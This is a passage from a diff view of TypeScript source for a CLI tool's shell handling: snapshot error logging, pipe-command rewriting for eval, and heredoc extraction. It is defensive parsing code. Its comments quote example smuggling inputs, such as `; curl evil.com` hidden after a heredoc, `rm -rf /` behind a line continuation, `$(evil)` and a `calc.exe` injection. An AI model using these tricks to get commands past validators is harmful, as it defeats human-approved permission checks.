logForDebugging(` - Working directory: ${getCwd()}`)
logForDebugging(` - Claude home: ${getClaudeConfigHomeDir()}`)
logForDebugging(`Full snapshot script:\n${snapshotScript}`)
if (stdout) {
logForDebugging(
`stdout output (${stdout.length} chars):\n${stdout}`,
)
} else {
logForDebugging(`No stdout output captured`)
}
if (stderr) {
logForDebugging(
`stderr output (${stderr.length} chars): ${stderr}`,
)
} else {
logForDebugging(`No stderr output captured`)
}
logError(
new Error(`Failed to create shell snapshot: ${error.message}`),
)
// Convert signal name to number if present
const signalNumber = execError?.signal
? os.constants.signals[
execError.signal as keyof typeof os.constants.signals
]
: undefined
logEvent('tengu_shell_snapshot_failed', {
stderr_length: stderr?.length || 0,
has_error_code: !!execError?.code,
error_signal_number: signalNumber,
error_killed: execError?.killed,
})
resolve(undefined)
} else {
// The shell exited cleanly; confirm the snapshot file really exists
// before handing its path back.
let snapshotSize: number | undefined
try {
snapshotSize = (await stat(shellSnapshotPath)).size
} catch {
// Snapshot file not found
}
if (snapshotSize !== undefined) {
logForDebugging(
`Shell snapshot created successfully (${snapshotSize} bytes)`,
)
// Register cleanup to remove snapshot on graceful shutdown
registerCleanup(async () => {
try {
await getFsImplementation().unlink(shellSnapshotPath)
logForDebugging(
`Cleaned up session snapshot: ${shellSnapshotPath}`,
)
} catch (error) {
logForDebugging(
`Error cleaning up session snapshot: ${error}`,
)
}
})
resolve(shellSnapshotPath)
} else {
// Clean exit but no file: log what the snapshots directory looks like
// to help diagnose, then report an unknown error.
logForDebugging(
`Shell snapshot file not found after creation: ${shellSnapshotPath}`,
)
logForDebugging(
`Checking if parent directory still exists: ${snapshotsDir}`,
)
try {
const dirContents =
await getFsImplementation().readdir(snapshotsDir)
logForDebugging(
`Directory contains ${dirContents.length} files`,
)
} catch {
logForDebugging(
`Parent directory does not exist or is not accessible: ${snapshotsDir}`,
)
}
logEvent('tengu_shell_unknown_error', {})
resolve(undefined)
}
}
},
)
} catch (error) {
// Anything thrown while preparing the snapshot (path checks, mkdir, script
// generation, spawning) ends up here.
logForDebugging(`Unexpected error during snapshot creation: ${error}`)
if (error instanceof Error) {
logForDebugging(`Error stack trace: ${error.stack}`)
}
logError(error)
logEvent('tengu_shell_snapshot_error', {})
resolve(undefined)
}
})
}
+2679
View File
File diff suppressed because it is too large Load Diff
File diff suppressed because it is too large Load Diff
+294
View File
@@ -0,0 +1,294 @@
import {
hasMalformedTokens,
hasShellQuoteSingleQuoteBug,
type ParseEntry,
quote,
tryParseShellCommand,
} from './shellQuote.js'
/**
 * Rearranges a command with pipes to place stdin redirect after the first command.
 * This fixes an issue where eval treats the entire piped command as a single unit,
 * causing the stdin redirect to apply to eval itself rather than the first command.
 *
 * The command is only rebuilt token-by-token when every guard below passes.
 * In all other cases the untouched original command is handed to
 * quoteWithEvalStdinRedirect instead. The guards are deliberately
 * conservative: several of them exist to stop a tokenizer/bash mismatch from
 * turning into command injection.
 *
 * @param command - The raw shell command.
 * @returns Either the rebuilt pipeline (`first_command < /dev/null | rest`)
 *   passed through singleQuoteForEval, or the result of
 *   quoteWithEvalStdinRedirect(command).
 */
export function rearrangePipeCommand(command: string): string {
// Skip if command has backticks - shell-quote doesn't handle them well
if (command.includes('`')) {
return quoteWithEvalStdinRedirect(command)
}
// Skip if command has command substitution - shell-quote parses $() incorrectly,
// treating ( and ) as separate operators instead of recognizing command substitution
if (command.includes('$(')) {
return quoteWithEvalStdinRedirect(command)
}
// Skip if command references shell variables ($VAR, ${VAR}). shell-quote's parse()
// expands these to empty string when no env is passed, silently dropping the
// reference. Even if we preserved the token via an env function, quote() would
// then escape the $ during rebuild, preventing runtime expansion. See #9732.
if (/\$[A-Za-z_{]/.test(command)) {
return quoteWithEvalStdinRedirect(command)
}
// Skip if command contains bash control structures (for/while/until/if/case/select)
// shell-quote cannot parse these correctly and will incorrectly find pipes inside
// the control structure body, breaking the command when rearranged
if (containsControlStructure(command)) {
return quoteWithEvalStdinRedirect(command)
}
// Join continuation lines before parsing: shell-quote doesn't handle \<newline>
// and produces empty string tokens for each occurrence, causing spurious empty
// arguments in the reconstructed command
const joined = joinContinuationLines(command)
// shell-quote treats bare newlines as whitespace, not command separators.
// Parsing+rebuilding 'cmd1 | head\ncmd2 | grep' yields 'cmd1 | head cmd2 | grep',
// silently merging pipelines. Line-continuation (\<newline>) is already stripped
// above; any remaining newline is a real separator. Bail to the eval fallback,
// which preserves the newline inside a single-quoted arg. See #32515.
if (joined.includes('\n')) {
return quoteWithEvalStdinRedirect(command)
}
// SECURITY: shell-quote treats \' inside single quotes as an escape, but
// bash treats it as literal \ followed by a closing quote. The pattern
// '\' <payload> '\' makes shell-quote merge <payload> into the quoted
// string, hiding operators like ; from the token stream. Rebuilding from
// that merged token can expose the operators when bash re-parses.
if (hasShellQuoteSingleQuoteBug(joined)) {
return quoteWithEvalStdinRedirect(command)
}
const parseResult = tryParseShellCommand(joined)
// If parsing fails (malformed syntax), fall back to quoting the whole command
if (!parseResult.success) {
return quoteWithEvalStdinRedirect(command)
}
const parsed = parseResult.tokens
// SECURITY: shell-quote tokenizes differently from bash. Input like
// `echo {"hi":\"hi;calc.exe"}` is a bash syntax error (unbalanced quote),
// but shell-quote parses it into tokens with `;` as an operator and
// `calc.exe` as a separate word. Rebuilding from those tokens produces
// valid bash that executes `calc.exe` — turning a syntax error into an
// injection. Unbalanced delimiters in a string token signal this
// misparsing; fall back to whole-command quoting, which preserves the
// original (bash then rejects it with the same syntax error it would have
// raised without us).
if (hasMalformedTokens(joined, parsed)) {
return quoteWithEvalStdinRedirect(command)
}
const firstPipeIndex = findFirstPipeOperator(parsed)
// -1 means there is no pipe at all; 0 means the pipe is the very first token,
// so there is no first command to attach the redirect to.
if (firstPipeIndex <= 0) {
return quoteWithEvalStdinRedirect(command)
}
// Rebuild: first_command < /dev/null | rest_of_pipeline
// The second slice starts AT the pipe token, so the `|` itself is emitted
// as part of the remainder.
const parts = [
...buildCommandParts(parsed, 0, firstPipeIndex),
'< /dev/null',
...buildCommandParts(parsed, firstPipeIndex, parsed.length),
]
return singleQuoteForEval(parts.join(' '))
}
/**
 * Locates the first `|` operator token in a parsed shell command.
 *
 * @param parsed - Token list produced by the shell-quote parser.
 * @returns Index of the first pipe operator, or -1 when there is none.
 */
function findFirstPipeOperator(parsed: ParseEntry[]): number {
  return parsed.findIndex(entry => isOperator(entry, '|'))
}
/**
 * Re-serialises the parsed entries in `[start, end)` into shell text pieces
 * (the caller joins them with spaces).
 *
 * - An fd number (0, 1 or 2) followed by a redirection operator is emitted as
 *   one compact piece (`2>&1`, `2>/dev/null`) so it stays a single unit.
 * - Leading `NAME=value` words of each command keep their `=` unquoted; only
 *   the value is passed through `quote`.
 * - Every other string is quoted as a whole; glob patterns and operators are
 *   emitted verbatim.
 *
 * @param parsed - Parsed entries of the whole command
 * @param start - Index of the first entry to serialise (inclusive)
 * @param end - Index one past the last entry to serialise (exclusive)
 * @returns The serialised pieces, in order
 */
function buildCommandParts(
  parsed: ParseEntry[],
  start: number,
  end: number,
): string[] {
  const fdPattern = /^[012]$/

  // Returns the compact text for an fd redirection whose three entries
  // (fd, operator, target) begin at `at`, or null when the entries there do
  // not form one of the recognised shapes.
  const fdRedirectAt = (at: number): string | null => {
    const fd = parsed[at]
    if (typeof fd !== 'string' || !fdPattern.test(fd)) return null
    // All three entries must lie inside [start, end)
    if (at + 2 >= end) return null
    const operator = parsed[at + 1]
    if (!isOperator(operator)) return null
    const target = parsed[at + 2]

    if (operator.op === '>&') {
      // 2>&1 style
      return typeof target === 'string' && fdPattern.test(target)
        ? `${fd}>&${target}`
        : null
    }
    if (operator.op === '>') {
      // 2>/dev/null style
      if (target === '/dev/null') return `${fd}>/dev/null`
      // 2> &1 style (space between > and &1)
      if (typeof target === 'string' && target.startsWith('&')) {
        const duplicated = target.slice(1)
        if (fdPattern.test(duplicated)) return `${fd}>&${duplicated}`
      }
    }
    return null
  }

  const pieces: string[] = []
  // Assignments are only recognised before the first ordinary word of a
  // command; this flips back on after a command separator.
  let assignmentsAllowed = true
  let cursor = start

  while (cursor < end) {
    const redirect = fdRedirectAt(cursor)
    if (redirect !== null) {
      pieces.push(redirect)
      cursor += 3
      continue
    }

    const token = parsed[cursor]
    cursor += 1

    if (typeof token === 'string') {
      if (assignmentsAllowed && isEnvironmentVariableAssignment(token)) {
        // Keep NAME= as-is and quote only the value, so spaces and special
        // characters in the value survive without breaking the assignment.
        const equalsAt = token.indexOf('=')
        const variableName = token.slice(0, equalsAt)
        const quotedValue = quote([token.slice(equalsAt + 1)])
        pieces.push(`${variableName}=${quotedValue}`)
        continue
      }
      // First ordinary word: everything after it is an argument
      assignmentsAllowed = false
      pieces.push(quote([token]))
      continue
    }

    if (!isOperator(token)) continue

    if (token.op === 'glob' && 'pattern' in token) {
      // Glob patterns must stay unquoted so the shell can expand them
      pieces.push(token.pattern as string)
      continue
    }

    pieces.push(token.op)
    // The command after a separator may carry its own assignments
    if (isCommandSeparator(token.op)) {
      assignmentsAllowed = true
    }
  }

  return pieces
}
/**
 * Tells whether a word has the shape of an environment variable assignment
 * (`NAME=value`). NAME must begin with a letter or underscore and continue
 * with letters, digits or underscores; the value may be empty.
 *
 * @param str - A single shell word
 * @returns true when the text before the first `=` is a valid variable name
 */
function isEnvironmentVariableAssignment(str: string): boolean {
  const equalsAt = str.indexOf('=')
  if (equalsAt <= 0) {
    // No `=` at all, or nothing in front of it
    return false
  }
  return /^[A-Za-z_][A-Za-z0-9_]*$/.test(str.slice(0, equalsAt))
}
/**
 * Checks if an operator is a command separator that starts a new command context.
 * After these operators, environment variable assignments are valid again.
 *
 * Besides the list operators (`&&`, `||`, `;`), the pipe operators (`|`, `|&`)
 * and the background operator (`&`) also begin a new simple command. Without
 * them, an assignment prefix after a later pipe — `a | b | FOO=1 c` — is
 * treated as an ordinary argument and quoted as a whole, which escapes the
 * `=` and turns the assignment into a bogus command name.
 *
 * @param op - Operator text from a parsed operator entry
 * @returns true when the word after `op` is at the start of a new command
 */
function isCommandSeparator(op: string): boolean {
  switch (op) {
    case '&&':
    case '||':
    case ';':
    case '|':
    case '|&':
    case '&':
      return true
    default:
      return false
  }
}
/**
 * Type guard for operator entries of a parsed command: objects carrying an
 * `op` property.
 *
 * @param entry - Any parsed entry (or arbitrary value)
 * @param op - When given (and non-empty), the entry's `op` must equal it
 * @returns true when `entry` is an operator entry (matching `op`, if given)
 */
function isOperator(entry: unknown, op?: string): entry is { op: string } {
  if (typeof entry !== 'object' || entry === null || !('op' in entry)) {
    return false
  }
  if (!op) {
    // No specific operator requested: any operator entry qualifies
    return true
  }
  return entry.op === op
}
/**
 * Detects bash control structures (for/while/until/if/case/select) that
 * shell-quote cannot parse.
 *
 * A keyword only counts when it starts at a word boundary and is followed by
 * whitespace, which avoids matching commands or arguments that merely contain
 * one of these words (e.g. `format`, `elif`).
 *
 * @param command - The shell command string
 * @returns true when such a keyword occurs anywhere in the command
 */
function containsControlStructure(command: string): boolean {
  const controlKeyword = /\b(for|while|until|if|case|select)\s/
  return command.search(controlKeyword) >= 0
}
/**
 * Single-quotes the whole command for eval and appends `< /dev/null` as a
 * redirect on eval itself, not as part of eval's argument. This is the
 * fallback for pipe commands whose pipe boundary we cannot parse (e.g.
 * commands with $(), backticks, or control structures).
 *
 * Result shape: eval 'cmd' < /dev/null
 *   → eval's own stdin is /dev/null, and pipes inside 'cmd' work correctly.
 *
 * Quoting the redirect together with the command (`eval 'cmd' \< /dev/null`)
 * would instead make eval concatenate its arguments into `cmd < /dev/null`,
 * so the redirect would bind to the LAST command of the pipeline.
 *
 * @param command - The raw command text
 * @returns The quoted command followed by ` < /dev/null`
 */
function quoteWithEvalStdinRedirect(command: string): string {
  const quotedCommand = singleQuoteForEval(command)
  return `${quotedCommand} < /dev/null`
}
/**
 * Wraps a string in single quotes so it can be passed as one eval argument.
 * Each embedded single quote becomes '"'"' (close the single-quoted run, emit
 * a double-quoted single quote, reopen the single-quoted run).
 *
 * Preferred over shell-quote's quote(), which switches to double-quote mode
 * when the input contains single quotes and then escapes ! -> \!, corrupting
 * jq/awk filters like `select(.x != .y)` into `select(.x \!= .y)`.
 *
 * @param s - Text to quote
 * @returns The single-quoted text
 */
function singleQuoteForEval(s: string): string {
  const escapedQuote = `'"'"'`
  const body = s.split("'").join(escapedQuote)
  return `'${body}'`
}
/**
 * Joins shell continuation lines (backslash-newline) into a single line.
 *
 * For every run of backslashes directly followed by a newline:
 * - odd run length: the final backslash escapes the newline, so that
 *   backslash and the newline are removed and the rest of the run is kept;
 * - even run length: the backslashes pair up as escape sequences, the newline
 *   is a real separator, and the text is left untouched.
 *
 * @param command - The shell command string
 * @returns The command with line continuations joined
 */
function joinContinuationLines(command: string): string {
  return command.replace(/\\+\n/g, run => {
    // The run is N backslashes plus the trailing newline
    const slashes = run.length - 1
    const isContinuation = slashes % 2 !== 0
    return isContinuation ? run.slice(0, slashes - 1) : run
  })
}
File diff suppressed because it is too large Load Diff
+733
View File
@@ -0,0 +1,733 @@
/**
* Heredoc extraction and restoration utilities.
*
* The shell-quote library parses `<<` as two separate `<` redirect operators,
* which breaks command splitting for heredoc syntax. This module provides
* utilities to extract heredocs before parsing and restore them after.
*
* Supported heredoc variations:
* - <<WORD - basic heredoc
* - <<'WORD' - single-quoted delimiter (no variable expansion in content)
* - <<"WORD" - double-quoted delimiter (with variable expansion)
* - <<-WORD - dash prefix (strips leading tabs from content)
* - <<-'WORD' - combined dash and quoted delimiter
*
* Known limitations:
* - Heredocs inside backtick command substitution may not be extracted
* - Very complex multi-heredoc scenarios may not be extracted
*
* When extraction fails, the command passes through unchanged. This is safe
* because the unextracted heredoc will either cause shell-quote parsing to fail
* (falling back to treating the whole command as one unit) or require manual
* approval for each apparent subcommand.
*
* @module
*/
import { randomBytes } from 'crypto'
// Placeholders have the form `__HEREDOC_<index>_<salt>__`.
const HEREDOC_PLACEHOLDER_PREFIX = '__HEREDOC_'
const HEREDOC_PLACEHOLDER_SUFFIX = '__'

/**
 * Generates a random hex string for placeholder uniqueness.
 * This prevents collision when command text literally contains "__HEREDOC_N__".
 *
 * @returns 16 hex characters (8 random bytes)
 */
function generatePlaceholderSalt(): string {
  return randomBytes(8).toString('hex')
}

/**
 * Regex pattern for matching heredoc start syntax.
 *
 * Capture groups:
 *   1 - `-` when the operator is `<<-`
 *   2 - the opening quote character of a quoted delimiter
 *   3 - the delimiter word of a quoted delimiter
 *   4 - the delimiter word of an unquoted (possibly backslash-escaped) delimiter
 *
 * Two alternatives handle quoted vs unquoted delimiters differently:
 *
 * Alternative 1 (quoted): (['"]) (\\?\w+) \2
 *   Captures the opening quote, then the delimiter word (which MAY include a
 *   leading backslash since it's literal inside quotes), then the closing quote.
 *   In bash, single quotes make EVERYTHING literal including backslashes:
 *     <<'\EOF'  → delimiter is \EOF (with backslash)
 *     <<'EOF'   → delimiter is EOF
 *   Double quotes also preserve backslashes before non-special chars:
 *     <<"\EOF"  → delimiter is \EOF
 *
 * Alternative 2 (unquoted): \\?(\w+)
 *   Optionally consumes a leading backslash (escape), then captures the word.
 *   In bash, an unquoted backslash escapes the next character:
 *     <<\EOF   → delimiter is EOF (backslash consumed as escape)
 *     <<EOF    → delimiter is EOF (plain)
 *
 * SECURITY: The backslash MUST be inside the capture group for quoted
 * delimiters but OUTSIDE for unquoted ones. The old regex had \\? outside
 * the capture group unconditionally, causing <<'\EOF' to extract delimiter
 * "EOF" while bash uses "\EOF", allowing command smuggling.
 *
 * Note: Uses [ \t]* (not \s*) to avoid matching across newlines, which would be
 * a security issue (could hide commands between << and the delimiter).
 */
const HEREDOC_START_PATTERN =
  // eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by command.includes('<<') at extractHeredocs() entry
  /(?<!<)<<(?!<)(-)?[ \t]*(?:(['"])(\\?\w+)\2|\\?(\w+))/

export type HeredocInfo = {
  /**
   * Normalized heredoc text used for restoration: the operator text (`<<`,
   * optional `-`, delimiter as written) immediately followed by the body,
   * from the newline that precedes it through the closing delimiter.
   * Same-line text between the operator and that newline is NOT included.
   */
  fullText: string
  /** The delimiter word (without quotes) */
  delimiter: string
  /** Start position of the << operator in the original command */
  operatorStartIndex: number
  /** End position of the << operator (exclusive) - content on same line after this is preserved */
  operatorEndIndex: number
  /** Start position of heredoc content (the newline before content) */
  contentStartIndex: number
  /** End position of heredoc content including closing delimiter (exclusive) */
  contentEndIndex: number
}

export type HeredocExtractionResult = {
  /** The command with heredocs replaced by placeholders */
  processedCommand: string
  /** Map of placeholder string to original heredoc info */
  heredocs: Map<string, HeredocInfo>
}

/**
 * Extracts heredocs from a command string and replaces them with placeholders.
 *
 * This allows shell-quote to parse the command without mangling heredoc syntax.
 * After parsing, use `restoreHeredocs` to replace placeholders with original content.
 *
 * Whenever anything looks ambiguous the function errs towards NOT extracting:
 * the affected heredoc (or the whole command) is passed through unchanged so
 * its text stays visible to downstream validators.
 *
 * @param command - The shell command string potentially containing heredocs
 * @param options - `quotedOnly`: extract only heredocs whose delimiter is
 *   quoted or escaped (their bodies are literal text). Unquoted heredocs are
 *   left in place because bash expands `$()`, backticks and `${}` in them.
 * @returns Object containing the processed command and a map of placeholders to heredoc info
 *
 * @example
 * ```ts
 * const result = extractHeredocs(`cat <<EOF
 * hello world
 * EOF`);
 * // result.processedCommand === "cat __HEREDOC_0_a1b2c3d4__" (salt varies)
 * // result.heredocs has the mapping to restore later
 * ```
 */
export function extractHeredocs(
  command: string,
  options?: { quotedOnly?: boolean },
): HeredocExtractionResult {
  const heredocs = new Map<string, HeredocInfo>()

  // Quick check: if no << present, skip processing
  if (!command.includes('<<')) {
    return { processedCommand: command, heredocs }
  }

  // Security: Paranoid pre-validation. Our incremental quote/comment scanner
  // (see advanceScan below) does simplified parsing that cannot handle all
  // bash quoting constructs. If the command contains constructs that could
  // desync our quote tracking, bail out entirely rather than risk extracting
  // a heredoc with incorrect boundaries. This is defense-in-depth: each
  // construct below has caused or could cause a security bypass if we
  // attempt extraction.
  //
  // 1. $'...' or $"..." (ANSI-C / locale quoting — our quote tracker doesn't
  //    handle the $ prefix, would misparse the quotes)
  if (/\$['"]/.test(command)) {
    return { processedCommand: command, heredocs }
  }

  // 2. Backticks in the command text before the first <<. Backtick nesting
  //    has complex parsing rules, and backtick acts as shell_eof_token for
  //    PST_EOFTOKEN (make_cmd.c:606), enabling early heredoc closure that our
  //    parser can't replicate. We only check before << because backticks in
  //    heredoc body content are harmless.
  const firstHeredocPos = command.indexOf('<<')
  if (firstHeredocPos > 0 && command.slice(0, firstHeredocPos).includes('`')) {
    return { processedCommand: command, heredocs }
  }

  // Security: Check for arithmetic evaluation context before the first `<<`.
  // In bash, `(( x = 1 << 2 ))` uses `<<` as a BIT-SHIFT operator, not a
  // heredoc. If we mis-extract it, subsequent lines become "heredoc content"
  // and are hidden from security validators, while bash executes them as
  // separate commands. We bail entirely if `((` appears before `<<` without
  // a matching `))` — we can't reliably distinguish arithmetic `<<` from
  // heredoc `<<` in that context. Note: $(( is already caught by
  // validateDangerousPatterns, but bare (( is not.
  if (firstHeredocPos > 0) {
    const beforeHeredoc = command.slice(0, firstHeredocPos)
    // Count (( and )) occurrences — if unbalanced, `<<` may be arithmetic
    const openArith = (beforeHeredoc.match(/\(\(/g) || []).length
    const closeArith = (beforeHeredoc.match(/\)\)/g) || []).length
    if (openArith > closeArith) {
      return { processedCommand: command, heredocs }
    }
  }

  // Create a global version of the pattern for iteration
  const heredocStartPattern = new RegExp(HEREDOC_START_PATTERN.source, 'g')
  const heredocMatches: HeredocInfo[] = []

  // Security: When quotedOnly skips an unquoted heredoc, we still need to
  // track its content range so quoted heredocs that appear INSIDE (or share a
  // line with) the skipped unquoted heredoc's body are rejected. Without
  // this, `cat <<EOF\n<<'SAFE'\n$(evil)\nSAFE\nEOF` would extract <<'SAFE' as
  // a top-level heredoc, hiding $(evil) from validators — even though in
  // bash, $(evil) IS executed (unquoted <<EOF expands its body).
  const skippedHeredocRanges: Array<{
    contentStartIndex: number
    contentEndIndex: number
  }> = []

  // SECURITY: Body ranges of every heredoc recognised so far, whether it was
  // extracted or skipped. Heredoc body text is NOT shell syntax, so:
  //   - the quote/comment scanner steps over these ranges without touching
  //     its state, and
  //   - a `<<` located inside one of them is plain text, never an operator.
  // If the scanner read body text as shell syntax, an unbalanced quote in a
  // body (e.g. `it's`) would invert its quote state for the rest of the
  // command. A later `<<` that bash sees INSIDE a quoted string
  // (`echo '<<"B" ' '`) would then be treated as a real operator, and the
  // following lines — which bash EXECUTES — would be swallowed into a
  // placeholder and hidden from validators.
  const recognizedBodyRanges: Array<{
    contentStartIndex: number
    contentEndIndex: number
  }> = []

  // Returns the exclusive end of a recognised body that strictly contains
  // `pos` (after its leading newline, before its end), or -1 if there is none.
  const bodyEndContaining = (pos: number): number => {
    for (const range of recognizedBodyRanges) {
      if (pos > range.contentStartIndex && pos < range.contentEndIndex) {
        return range.contentEndIndex
      }
    }
    return -1
  }

  let match: RegExpExecArray | null

  // Incremental quote/comment scanner state.
  //
  // The regex walks forward through the command, and match.index is
  // monotonically increasing, so quote/comment/escape state is tracked
  // incrementally from the last scanned position instead of re-scanning from
  // position 0 on every match (which was O(n²) when a heredoc body contains
  // many `<<`, e.g. C++ with `std::cout << ...`).
  //
  // Quote state is COMMENT-BLIND — it never sees `#` and never skips
  // characters for being "in a comment". Inside single quotes, everything is
  // literal. Inside double quotes, backslash escapes the next char. An
  // unquoted backslash run of odd length escapes the next char.
  //
  // Comment state observes quote state (# inside quotes is not a comment) but
  // NOT the reverse. Any physical `\n` clears comment state — including `\n`
  // inside quotes.
  //
  // SECURITY: Do NOT let comment mode suppress quote-state updates. If `#` put
  // the scanner in a mode that skipped quote chars, then `echo x#"\n<<...`
  // (where bash treats `#` as part of the word `x#`, NOT a comment) would
  // report the `<<` as unquoted and EXTRACT it — hiding content from security
  // validators. Treating any unquoted `#` as a comment is over-eager (bash
  // requires word-start), but since quote tracking is independent, the
  // over-eagerness only causes SKIPS (safe direction), never extra
  // EXTRACTIONS.
  let scanPos = 0
  let scanInSingleQuote = false
  let scanInDoubleQuote = false
  let scanInComment = false
  // Inside "...": true if the previous char was a backslash (next char is escaped).
  // Carried across advanceScan calls so a `\` at scanPos-1 correctly escapes
  // the char at scanPos.
  let scanDqEscapeNext = false
  // Unquoted context: length of the consecutive backslash run ending at scanPos-1.
  // Used to determine if the char at scanPos is escaped (odd run = escaped).
  let scanPendingBackslashes = 0

  const advanceScan = (target: number): void => {
    for (let i = scanPos; i < target; i++) {
      // Step over recognised heredoc bodies, leaving scanner state exactly as
      // it was at the end of the operator's logical line. The loop increment
      // moves `i` to the first index after the body.
      const bodyEnd = bodyEndContaining(i)
      if (bodyEnd !== -1) {
        i = bodyEnd - 1
        continue
      }

      const ch = command[i]!

      // Any physical newline clears comment state, even inside quotes, so
      // clear BEFORE the quote branches.
      if (ch === '\n') scanInComment = false

      if (scanInSingleQuote) {
        if (ch === "'") scanInSingleQuote = false
        continue
      }

      if (scanInDoubleQuote) {
        if (scanDqEscapeNext) {
          scanDqEscapeNext = false
          continue
        }
        if (ch === '\\') {
          scanDqEscapeNext = true
          continue
        }
        if (ch === '"') scanInDoubleQuote = false
        continue
      }

      // Unquoted context. Quote tracking is COMMENT-BLIND: we do NOT skip
      // chars for being inside a comment. Only the `#` detection itself is
      // gated on not-in-comment.
      if (ch === '\\') {
        scanPendingBackslashes++
        continue
      }
      const escaped = scanPendingBackslashes % 2 === 1
      scanPendingBackslashes = 0
      if (escaped) continue

      if (ch === "'") scanInSingleQuote = true
      else if (ch === '"') scanInDoubleQuote = true
      else if (!scanInComment && ch === '#') scanInComment = true
    }
    scanPos = target
  }

  while ((match = heredocStartPattern.exec(command)) !== null) {
    const startIndex = match.index

    // Advance the incremental scanner to this match's position. After this,
    // scanInSingleQuote/scanInDoubleQuote/scanInComment reflect the parser
    // state immediately BEFORE startIndex, and scanPendingBackslashes is the
    // count of unquoted `\` immediately preceding startIndex.
    advanceScan(startIndex)

    // Security: Skip if this `<<` falls inside the body of an already
    // recognised heredoc (extracted, or skipped in quotedOnly mode). In bash,
    // `<<` inside a heredoc body is just text — it's not a nested heredoc
    // operator. Extracting it would hide content that bash actually expands.
    if (bodyEndContaining(startIndex) !== -1) {
      continue
    }

    // Skip if this << is inside a quoted string (not a real heredoc operator).
    if (scanInSingleQuote || scanInDoubleQuote) {
      continue
    }

    // Security: Skip if this << is inside a comment (after unquoted #).
    // In bash, `# <<EOF` is a comment — extracting it would hide commands on
    // subsequent lines as "heredoc content" while bash executes them.
    if (scanInComment) {
      continue
    }

    // Security: Skip if this << is preceded by an odd number of backslashes.
    // In bash, `\<<EOF` is NOT a heredoc — `\<` is a literal `<`, then `<EOF`
    // is input redirection. Extracting it would drop same-line commands from
    // security checks.
    if (scanPendingBackslashes % 2 === 1) {
      continue
    }

    const fullMatch = match[0]
    const isDash = match[1] === '-'
    // Group 3 = quoted delimiter (may include backslash), group 4 = unquoted
    const delimiter = (match[3] || match[4])!
    const operatorEndIndex = startIndex + fullMatch.length

    // Security: Two checks to verify our regex captured the full delimiter word.
    // Any mismatch between our parsed delimiter and bash's actual delimiter
    // could allow command smuggling past permission checks.

    // Check 1: If a quote was captured (group 2), verify the match really
    // ends on the closing quote. The regex's \w+ only matches [a-zA-Z0-9_],
    // so non-word chars inside quotes (spaces, hyphens, dots) must never
    // yield a truncated delimiter such as "EO" for <<"EO F".
    const quoteChar = match[2]
    if (quoteChar && command[operatorEndIndex - 1] !== quoteChar) {
      continue
    }

    // Security: Determine if the delimiter is quoted ('EOF', "EOF") or
    // escaped (\EOF). In bash, quoted/escaped delimiters suppress all
    // expansion in the heredoc body — content is literal text. Unquoted
    // delimiters (<<EOF) perform full shell expansion: $(), backticks,
    // and ${} in the body ARE executed. In quotedOnly mode unquoted heredocs
    // are not extracted — but only AFTER their content range has been
    // computed and recorded (see below).
    const isEscapedDelimiter = fullMatch.includes('\\')
    const isQuotedOrEscaped = !!quoteChar || isEscapedDelimiter

    // Check 2: Verify the next character after our match is a bash word
    // terminator (metacharacter or end of string). Characters like word chars,
    // quotes, $, \ mean the bash word extends beyond our match
    // (e.g., <<'EOF'a where bash uses "EOFa" but we captured "EOF").
    // IMPORTANT: Only match bash's actual metacharacters — space (0x20),
    // tab (0x09), newline (0x0A), |, &, ;, (, ), <, >. Do NOT use \s which
    // also matches \r, \f, \v, and Unicode whitespace that bash treats as
    // regular word characters, not terminators.
    if (operatorEndIndex < command.length) {
      const nextChar = command[operatorEndIndex]!
      if (!/^[ \t\n|&;()<>]$/.test(nextChar)) {
        continue
      }
    }

    // In bash, heredoc content starts on the NEXT LINE after the operator.
    // Any content on the same line after <<EOF (like " && echo done") is part
    // of the command, not the heredoc content.
    //
    // SECURITY: The "same line" must be the LOGICAL command line, not the
    // first physical newline. Multi-line quoted strings extend the logical
    // line — bash waits for the quote to close before starting to read the
    // heredoc body. A quote-blind `indexOf('\n')` finds newlines INSIDE
    // quoted strings, causing the body to start too early.
    //
    // Exploit: `echo <<'EOF' '${}\n' ; curl evil.com\nEOF`
    //   - The `\n` inside `'${}\n'` is quoted (literal newline in a string arg)
    //   - Bash: logical line is `echo <<'EOF' '${}\n' ; curl evil.com`,
    //     heredoc body = `EOF`
    //   - Quote-blind search: body starts at `' ; curl evil.com\nEOF`, so
    //     curl is swallowed into the placeholder and NEVER reaches
    //     permission checks.
    //
    // So: scan forward from operatorEndIndex with quote-state tracking and
    // take the first newline that's NOT inside a quoted string.
    let firstNewlineOffset = -1
    {
      let inSingleQuote = false
      let inDoubleQuote = false
      // We start with clean quote state — the checks above already rejected
      // the case where the `<<` operator itself is inside a quote.
      for (let k = operatorEndIndex; k < command.length; k++) {
        const ch = command[k]
        if (inSingleQuote) {
          if (ch === "'") inSingleQuote = false
          continue
        }
        if (inDoubleQuote) {
          if (ch === '\\') {
            k++ // skip escaped char inside double quotes
            continue
          }
          if (ch === '"') inDoubleQuote = false
          continue
        }
        // Unquoted context
        if (ch === '\n') {
          firstNewlineOffset = k - operatorEndIndex
          break
        }
        // Count backslashes for escape detection in unquoted context
        let backslashCount = 0
        for (let j = k - 1; j >= operatorEndIndex && command[j] === '\\'; j--) {
          backslashCount++
        }
        if (backslashCount % 2 === 1) continue // escaped char
        if (ch === "'") inSingleQuote = true
        else if (ch === '"') inDoubleQuote = true
      }
      // If we ended while still inside a quote, the logical line never ends —
      // there is no heredoc body. firstNewlineOffset stays -1 (handled below).
    }

    // If no unquoted newline found, this heredoc has no content - skip it
    if (firstNewlineOffset === -1) {
      continue
    }

    // Security: Check for backslash-newline continuation at the end of the
    // same-line content (text between the operator and the newline). In bash,
    // `\<newline>` joins lines BEFORE heredoc parsing — so:
    //   cat <<'EOF' && \
    //   rm -rf /
    //   content
    //   EOF
    // bash joins to `cat <<'EOF' && rm -rf /` (rm is part of the command line),
    // then heredoc body = `content`. Our extractor runs BEFORE continuation
    // joining (commands.ts:82), so it would put `rm -rf /` in the heredoc body,
    // hiding it from all validators. Bail if same-line content ends with an
    // odd number of backslashes.
    const sameLineContent = command.slice(
      operatorEndIndex,
      operatorEndIndex + firstNewlineOffset,
    )
    let trailingBackslashes = 0
    for (let j = sameLineContent.length - 1; j >= 0; j--) {
      if (sameLineContent[j] === '\\') {
        trailingBackslashes++
      } else {
        break
      }
    }
    if (trailingBackslashes % 2 === 1) {
      // Odd number of trailing backslashes → last one escapes the newline
      // → this is a line continuation we would misparse. Bail out.
      continue
    }

    const contentStartIndex = operatorEndIndex + firstNewlineOffset
    const afterNewline = command.slice(contentStartIndex + 1) // +1 to skip the newline itself
    const contentLines = afterNewline.split('\n')

